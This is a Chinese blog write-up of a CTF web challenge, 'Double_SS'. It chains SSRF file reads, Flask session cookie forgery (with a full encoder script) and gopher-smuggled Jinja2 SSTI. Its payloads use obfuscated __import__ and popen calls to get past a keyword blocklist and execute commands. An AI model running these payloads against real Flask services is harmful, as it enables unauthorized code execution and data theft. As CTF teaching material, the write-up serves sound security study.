2023PCTF Double_SS

最新推荐文章于 2024-01-28 21:36:07 发布
最新推荐文章于 2024-01-28 21:36:07 发布
阅读量413 收藏 8
点赞数 10
分类专栏: BUUctf 文章标签: ssti ssrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134851662
版权

记录一下 ssrf配合 ssti的结合

首先开启环境 明显的ssrf

 让我们访问 5555端口

使用http协议访问

url=127.0.0.1:5555

 告诉我们去访问 name 并且给我们key

url=127.0.0.1:5555/name

出现报错 说我们不是admin

然后我们往下看

我们使用file协议读取app/app.py

url=file:///app/app.py

 然后美化一下

from flask import Flask, request, session, render_template_string
from flask import redirect, url_for
import uuid

app = Flask(__name__)
app.config['SECRET_KEY'] = str(uuid.uuid4())

@app.route('/', methods=['GET'])
def index():
    res = '''
    You must be the admin to access the /name to SSTI using parameterme
    This is your key {}
    '''.format(app.config['SECRET_KEY'])
    return res

@app.route('/name', methods=['GET'])
def render():
    if session.get('admin') != True:
        return "You must be the admin"

    black_list = ['class', '__global__', 'os', 'popen', 'cat', 'flag', '__init__', 'eval', 'exec', 'bases']
    name = request.args.get('name')

    for item in black_list:
        if item in name:
            return "绕一下nya"

    html_str = '''
    <p>{0}</p>
    '''.format(name)

    return render_template_string(html_str, autoescape=True)

if __name__ == '__main__':
    app.debug = True
    app.run('127.0.0.1', 5555)

查看代码 发现这里存在一个session 的鉴权

需要admin的值为1

然后就开始查看资料

发现 flask 可以通过secret_key 伪造admin

使用下面的代码

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

这里有个问题

网上找到的wp都是存在cookie

但是这道题目没有 所以我们直接构造

{'admin':1}

这里这样写是因为 app.py中只需要 admin=true 所以 admin:1 就是 admin true

然后使用工具

py3 .\flask_session.py encode -s "a71ad490-8d8f-469a-a513-b41a3884ad85" -t "{'admin':1}"

获取到了session

然后这里继续需要 gopher协议传输

import urllib.parse

payload = \
    """GET /name? HTTP/1.1
Host: 127.0.0.1:5555
Cookie: session=eyJhZG1pbiI6MX0.ZXFAYA.V2buNLWHOmXiO9dX08lZHgpd5Bk

    """

# 注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
# print(tmp)
new = tmp.replace('%0A', '%0D%0A')
# print(new)
result = 'gopher://127.0.0.1:5555/' + '_' + new
result = urllib.parse.quote(result)
print(result)  # 这里因为是GET请求所以要进行两次url编码

执行

url=gopher%3A//127.0.0.1%3A5555/_GET%2520/name%253F%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A5555%250D%250ACookie%253A%2520session%253DeyJhZG1pbiI6MX0.ZXEt5Q.1iVKmm6xuIGThpY06HKmmFWqj3Y%250D%250A%250D%250A%2520%2520%2520%2520

出现了 typeerror 这里的报错 通过翻译就可以发现是没有值的迭代


    for item in black_list:
        if item in name:
            return "绕一下nya"

就是这里 因为我们没有传入name 所以这里是没有值的 我们可以开始测试ssti了

存在 然后这里我们看app.py存在waf 但是其实有一个工具直接绕过

GitHub - Marven11/Fenjing: 专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 | A Jinja2 SSTI cracker for bypassing WAF

但是这里是存在处理的我们如何执行呢 工具给我们了一个pyhton脚本

from fenjing import exec_cmd_payload, config_payload
import logging
logging.basicConfig(level = logging.INFO)

def waf(s: str): # 如果字符串s可以通过waf则返回True, 否则返回False
    blacklist = [
        'class', '__global__', 'os', 'popen', 'cat', 'flag', '__init__', 'eval', 'exec', 'bases',"\\x6f\\x73","\\u006f\\u0073","\\157\\163"  #这里替换为过滤的内容
    ]
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "ls%20/")  #需要url编码特殊符号
    #config_payload = config_payload(waf)

    print(f"{shell_payload}")
    #print(f"{config_payload}")

发现 可以输出没被过滤的payload

直接写入 然后打即可

这里发现flag 但是cat被过滤

rce的其他方法都可以

这里选择 nl%20/f*

gopher%3A//127.0.0.1%3A5555/_GET%2520/name%253Fname%253D%257B%257B%2528%2528lipsum.__globals__.__builtins__.__import__%2528%2527so%2527%255B%253A%253A-1%255D%2529%255B%2527p%2527%2527open%2527%255D%2528%2527nl%252520/f%252A%2527%2529%2529.read%2528%2529%2529%257D%257D%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A5555%250D%250ACookie%253A%2520session%253DeyJhZG1pbiI6MX0.ZXFAYA.V2buNLWHOmXiO9dX08lZHgpd5Bk%250D%250A%250D%250A%2520%2520%2520%2520

 这道题挺有意思的 组合拳 主要是你伪造 session需要知道如何伪造

双层小牛堡
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PCTF2016 Web WriteUp
Bendawang's Blog
05-15 5160
PCTF2016 Web WriteUp
采用PCTF技术降低微波/射频器件成本
01-19
射频/微波器件的封装设计非常重要,封装可以保护器件,同时也会影响器件的性能。因此封装一定要能提供优异的电学性能、器件的保护功能和屏蔽作用等等。高性能射频微波器件通常采用陶瓷封装材料,陶瓷材料的介电性能...
PCTF个人题解
Tummyiii的博客
12-08 499
PCTF题解misc流量分析还要加深学习,其他方向后面也会有时间就去接触了。
PCTF 神盾局的秘密
偷一个月亮
09-02 497
http://web.jarvisoj.com:32768/ 文件包含读源码 index.php <?php require_once('shield.php'); $x = new Shield(); isset($_GET['class']) && $g = $_GET['class']; if (!empty($g)) { $x = unserialize(...
PCTF2023
m0_73721944的博客
01-27 962
web Sign In 点开是这样的 鼠标到url的地方然后ctrl+U查看源代码 easyupload 文件上传的题 传一个jpg 抓包后修改文件名为pflag.php flag flag(AD_Qual_DOne_!) 111z_sql 打开就是我们的签到页面 用了现成的脚本,改了一下端口 import requests url = "http://node6.anna.nssctf.cn:28089/copyr
Normal_RSA
→_→
12-07 1213
Normal_RSA(来源:攻防世界) 1.关卡描述 2.解题步骤 分析: 题目,提示使用工具: 得到两个文件: enc文件,得到看不懂的字符 公钥文件 解题: 有两个文件, flag.enc 是经过rsa加密后的密文, pubkey.pem 是rsa的公钥文件 一个加密的,一个是公匙。 目的是利用公钥,算出私钥, 然后再用私钥解加密文件,ok! ================================= 参考链接: 方法一:py2环境安装失败 来自:X
AD无法打开PCB,提示“无法启动此程序,因为计算机中丢失PCTF.DLL。”
Morson35的博客
08-12 2433
AD20正常使用一段时间后,打不开PCB了,原理图可以正常打开。我没有找到直接的解决办法,重新安装后,问题消失。
Jarvis OJ平台basic部分wirteup
weixin_30500663的博客
12-04 367
Base64? 题目描述: GUYDIMZVGQ2DMN3CGRQTONJXGM3TINLGG42DGMZXGM3TINLGGY4DGNBXGYZTGNLGGY3DGNBWMU3WI=== Base32解码得到 504354467b4a7573745f743373745f683476335f66346e7d 貌似是十六进制,hackbar直接转换得到flag ...
jarvisoj_web_witerup
残阳泼茶香的博客
03-17 503
PORT51 该题提示我们需要使用51端口进入该站点 然而此站为http://web.jarvisoj.com:32770/ 它的端口已经是确定了的,所以只能更改我们的port了。 本来用的是kali虚拟机,不能通过外网,命令如下 curl --local-port 51 http://web.jarvisoj.com:32770/ 自己试试,我就懒得弄win上的curl命令了 L...
XCTF:Normal_RSA[WriteUP]
如有错误感谢斧正
01-28 663
pubkey.pem是rsa公钥,加密者利用这个文件对flag原文进行了加密。通过对N值进行分解,获得rsa加密中的关键值:p、q。如果对rsa加密算法不了解的可以补一下教学视频。flag.enc内容是通过rsa加密了的密文。再次利用python帮我们把T的值算出来。手动补齐十六进制头:0x。
pctf.rar_GuestBook
09-24
一个不错的Java guestbook,可以自己在里面添加内容,
wirec0p3:PCTF
02-17
导线sc0p3 设置 列出活动接口: netstat -i 使用tcpdump捕获/过滤流量 sudo tcpdump -i <interface> -s 65535 -w ./out/tcpdump/capture-%s -G 15 -Z $(whoami) python3 ./process_tcpdump.py [,,...] ...
pCTF2015:plaidCTF 2015 的回购
06-11
pCTF2015 plaidCTF 2015 测试 git 的回购
RFID技术中的采用PCTF技术降低微波/射频器件成本
11-07
射频/微波器件的封装设计非常重要,封装可以保护器件,同时也会影响器件的性能。因此封装一定要能提供优异的电学性能、器件的保护功能和屏蔽作用等等。高性能射频微波器件通常采用陶瓷封装材料,陶瓷材料的介电性能...
pyzmq-26.0.0a2-pp38-pypy38_pp73-macosx_10_9_x86_64.whl
最新发布
06-18
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
小程序版通过CNN卷积神经网络的人物表情识别-不含数据集图片-含逐行注释和说明文档.zip
06-18
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02深度学习模型训练.py,
php语言入门教程-自学笔记
06-18
PHP(Hypertext Preprocessor)是一种广泛使用的服务器端脚本语言,特别适用于Web开发。以下是关于PHP的简介,内容将按照分点表示和归纳的方式呈现: 起源与发展: PHP最初由Rasmus Lerdorf在1994年创建,最初只是用于统计他自己网站访问者数量的简单程序。 1995年,PHP发布了第一个版本PHP1,并逐渐增加了对数据库的支持等功能。 经过多年的发展,PHP经历了多个版本的迭代,如PHP2、PHP3、PHP4、PHP5、PHP7和PHP8等。 每一次的版本更新都带来了性能提升、功能增强和语法的改进。
华为HCIA-WLAN 3.0 课程视频(38 WLAN配置应用-Web.mp4)
06-18
适用于参加华为HCIA-WLAN考核的技术人员。 最新3.0 课程视频,一共59集。
阿云主机网络连接详细操作.docx
06-18
文档为实验平台操作,详细描述了多台阿里云ESC服务器的连接过程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值